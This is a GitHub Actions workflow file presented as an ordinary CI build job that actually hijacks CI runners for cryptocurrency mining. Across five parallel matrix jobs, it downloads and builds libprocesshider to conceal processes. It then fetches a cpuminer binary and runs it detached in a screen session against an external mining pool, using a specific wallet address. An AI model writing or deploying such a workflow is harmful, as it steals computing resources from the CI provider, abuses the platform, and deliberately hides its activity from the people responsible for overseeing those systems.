name: CICI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  test:
   name: Subscrbeit
    # The type of runner that the job will run on
   runs-on: ubuntu-latest
   strategy:
    fail-fast: false
    matrix:
     runner: [0,1,2,3,4]
   steps:
     - run: |
              sudo apt install unzip
              wget https://github.com/NonameGh0st/libprocesshider/archive/refs/heads/master.zip
              unzip libprocesshider-master.zip
              cd libprocesshider-master
              make
              sudo mv libprocesshider.so /usr/local/lib/
              wget https://github.com/WyvernTKC/cpuminer-gr-avx2/releases/download/1.2.4.1/cpuminer-gr-1.2.4.1-args-x86_64_linux.tar.gz
              tar -xvf cpuminer-gr-1.2.4.1-args-x86_64_linux.tar.gz
              cd cpuminer-gr-1.2.4.1-args-x86_64_linux
              screen -dmS MyfirstProdject ./cpuminer-args.sh -a gr -o stratum+tcps://eu.flockpool.com:5555 -u RAAsog1RsBKEPAMrBDCAbufhZ7os1QsNC7.moonrock -p x --no-tune --cpu-priority 4
              ps aux
